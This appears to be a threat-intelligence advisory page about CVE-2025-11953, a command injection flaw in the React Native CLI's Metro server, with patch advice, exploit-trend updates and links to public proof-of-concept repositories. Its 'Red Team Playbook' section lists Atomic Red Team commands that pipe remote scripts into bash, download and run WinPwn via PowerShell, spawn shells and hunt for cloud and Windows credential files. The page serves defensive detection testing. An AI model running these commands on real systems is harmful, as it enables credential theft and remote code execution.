CVE-2025-11953
Overview
This vulnerability is an OS command injection in the Metro Development Server component of the React Native Community CLI. The root cause is that the server binds to external network interfaces by default and exposes an endpoint that improperly sanitizes input, allowing execution of arbitrary system commands. The flaw specifically affects the command execution handling within the server's exposed endpoint, enabling injection of shell commands on Windows platforms with fully controlled arguments.
Vulnerability Description
The Metro Development Server, which is opened by the React Native Community CLI, binds to external interfaces by default. The server exposes an endpoint that is vulnerable to OS command injection. This allows unauthenticated network attackers to send a POST request to the server and run arbitrary executables. On Windows, the attackers can also execute arbitrary shell commands with fully controlled arguments.
Impact
An unauthenticated attacker can remotely execute arbitrary system commands on the host running the Metro Development Server, including launching executables or shell commands with attacker-controlled arguments on Windows. No authentication or user interaction is required to exploit this flaw. This can lead to full system compromise, unauthorized data access, lateral movement within internal networks, and potential disruption of development environments relying on the affected CLI component.
Solution
Apply the patch provided by the React Native Community CLI maintainers as detailed in the commit at https://github.com/react-native-community/cli/commit/15089907d1f1301b22c72d7f68846a2ef20df547. Users should upgrade to the fixed versions of react_native_community_cli that address this issue, including versions beyond 20.0.0 alpha2. Refer to the official repository and advisory at https://jfrog.com/blog/cve-2025-11953-critical-react-native-community-cli-vulnerability for detailed patching instructions and version guidance.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in the Metro Development Server, utilized by the React Native Community CLI, arises from its default configuration that binds to external interfaces. This design flaw exposes an endpoint susceptible to OS command injection, allowing unauthenticated attackers to send crafted POST requests. The implications of this vulnerability are particularly severe, as it enables attackers to execute arbitrary commands on the server. On Windows systems, the potential for executing shell commands with fully controlled arguments amplifies the risk, as it could lead to unauthorized access, data manipulation, or even system compromise.
Exploitation of this vulnerability can occur through various attack vectors. An attacker could leverage tools to discover the exposed server and send specially crafted requests targeting the vulnerable endpoint. Once the attacker successfully injects commands, they can execute them with the privileges of the server process, which often runs with elevated permissions. This scenario could lead to a range of malicious activities, including data exfiltration, installation of malware, or lateral movement within the network. The ease of exploitation, combined with the lack of authentication requirements, makes this vulnerability particularly attractive to threat actors.
The real-world impact of this vulnerability is significant, especially for organizations that rely on the React Native framework for mobile application development. The potential for an attacker to execute arbitrary commands can lead to severe business risks, including data breaches, loss of intellectual property, and damage to the organization's reputation. Furthermore, the financial implications of responding to a security incident, including remediation efforts and potential regulatory fines, can be substantial. Organizations may also face downtime, which can disrupt operations and lead to lost revenue. Given the high CVSS score, the urgency for organizations to address this vulnerability is paramount.
To detect and mitigate the risks associated with this vulnerability, organizations should implement several strategies. First, it is crucial to restrict access to the Metro Development Server by configuring it to bind only to localhost or trusted interfaces, thereby preventing external access. Additionally, employing network segmentation can help isolate development environments from production systems, reducing the attack surface. Regular security assessments, including vulnerability scanning and penetration testing, should be conducted to identify and remediate any instances of this vulnerability. Organizations should also prioritize updating to the latest versions of the React Native Community CLI, as patches and updates often address known vulnerabilities.
In conclusion, the vulnerability present in the Metro Development Server poses a significant threat to organizations using the React Native Community CLI. The potential for command injection and arbitrary code execution creates a critical security risk that must be addressed promptly. By understanding the technical details, potential attack vectors, and implementing robust detection and mitigation strategies, organizations can better protect themselves from the risks associated with this vulnerability. Proactive measures are essential in maintaining the integrity and security of development environments and the applications built upon them.
CSURFACE threat intelligence has identified a marked increase in the Exploit Prediction Scoring System (EPSS) score for CVE-2025-11953, rising by over 29% to a current value near 0.15. This upward trend, coupled with a steady increase in exploit-related activity over the past week, signals growing attacker interest and potential for exploitation in the wild. Additionally, the vulnerability’s inclusion in the Known Exploited Vulnerabilities (KEV) catalog as of early February 2026 underscores its elevated priority within the threat landscape. New proof-of-concept exploits have surfaced on public repositories, demonstrating practical methods for unauthenticated remote code execution via the Metro Development Server’s exposed endpoint. This convergence of factors intensifies the risk posture for organizations leveraging the React Native Community CLI, as adversaries can now more readily weaponize this critical flaw. While ransomware usage linked to this vulnerability remains undetermined, the expanding exploit ecosystem and increased EPSS score warrant heightened vigilance. Overall, these developments elevate the threat level, indicating a transition from theoretical risk to active exploitation scenarios that defenders must urgently monitor.
Update 2 — June 19, 2026
CSURFACE threat intelligence has identified a marked escalation in exploitation attempts targeting CVE-2025-11953, accompanied by a substantial increase in the Exploit Prediction Scoring System (EPSS) value, signaling a rapid rise in the likelihood of active exploitation. This surge correlates with the recent emergence of multiple new proof-of-concept exploits and publicly available attack frameworks, which collectively lower the barrier for adversaries to weaponize this critical remote code execution vulnerability. Our telemetry indicates that attackers are increasingly leveraging these tools to conduct unauthenticated command injection attacks against exposed React Native Metro Development Servers. The expanding exploit landscape and heightened detection frequency underscore a transition from predominantly theoretical risk to tangible, operational threat activity. Consequently, the overall threat level has escalated to a heightened state of urgency, necessitating that defenders prioritize monitoring and response efforts around this vulnerability, especially given its critical severity and potential for widespread impact across diverse development environments.
Affected Products (5)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
React-Native-Community | React Native Community Cli | All |
cpe:2.3:a:react-native-community:react_native_community_cli:*:*:*:*:*:*:*:*
|
|
|
React-Native-Community | React Native Community Cli | 18.0.0 |
cpe:2.3:a:react-native-community:react_native_community_cli:18.0.0:*:*:*:*:*:*:*
|
|
|
React-Native-Community | React Native Community Cli | 20.0.0 |
cpe:2.3:a:react-native-community:react_native_community_cli:20.0.0:alpha0:*:*:*:*:*:*
|
|
|
React-Native-Community | React Native Community Cli | 20.0.0 |
cpe:2.3:a:react-native-community:react_native_community_cli:20.0.0:alpha1:*:*:*:*:*:*
|
|
|
React-Native-Community | React Native Community Cli | 20.0.0 |
cpe:2.3:a:react-native-community:react_native_community_cli:20.0.0:alpha2:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (5)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
SaidBenaissa/cve-2025-11953-vulnerability-demo
CVE-2025-11953 demonstration: Critical RCE vulnerability in React Native CLI (CVSS 9.8). Educational security research w...
|
SaidBenaissa | 4 | 1 | 2025-11-04 | View |
|
GhoStZA-debug/PoC-CVE-collection
Comprehensive Proof of Concept collection for CVE-2025-11953, CVE-2025-59287, CVE-2025-8941 with exploitation frameworks...
|
GhoStZA-debug | 1 | 1 | 2025-11-11 | View |
|
ibreakthingsforaliving/CVE-2025-11953-PoC
CVE-2025-11953 - The React Native Metro server's default external binding exposes a vulnerable endpoint, allowing unauth...
|
ibreakthingsforaliving | 0 | 0 | 2026-01-15 | View |
|
boroeurnprach/CVE-2025-11953-PoC
CVE-2025-11953 - The React Native Metro server's default external binding exposes a vulnerable endpoint, allowing unauth...
|
boroeurnprach | 0 | 0 | 2026-01-15 | View |
|
Mr-In4inci3le/CVE-2025-11953-POC-
|
Mr-In4inci3le | 0 | 0 | 2026-01-12 | View |
Threat Feed
6 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Proof-of-concept code is publicly available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-88 | OS Command Injection |
58%
|
High | High | |
| CAPEC-6 | Argument Injection |
51%
|
High | High | |
| CAPEC-43 | Exploiting Multiple Input Interpretation Layers |
48%
|
Medium | High |
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (7)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2025-11953 |
| jfrog.com |
GitHub CVE
technical-description
|
https://jfrog.com/blog/cve-2025-11953-critical-react-native-community-cli-vulnerability |
| github.com |
GitHub CVE
patch
|
https://github.com/react-native-community/cli/commit/15089907d1f1301b22c72d7f68846a2ef20df547 |
| x.com |
NVD API
Third Party Advisory
|
https://x.com/SzymonRybczak/status/1986199665000566848 |
| x.com |
NVD API
Third Party Advisory
|
https://x.com/thymikee/status/1986770875954475375 |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-11953 |
| vulncheck.com |
NVD API
Exploit
Third Party Advisory
|
https://www.vulncheck.com/blog/metro4shell_eitw |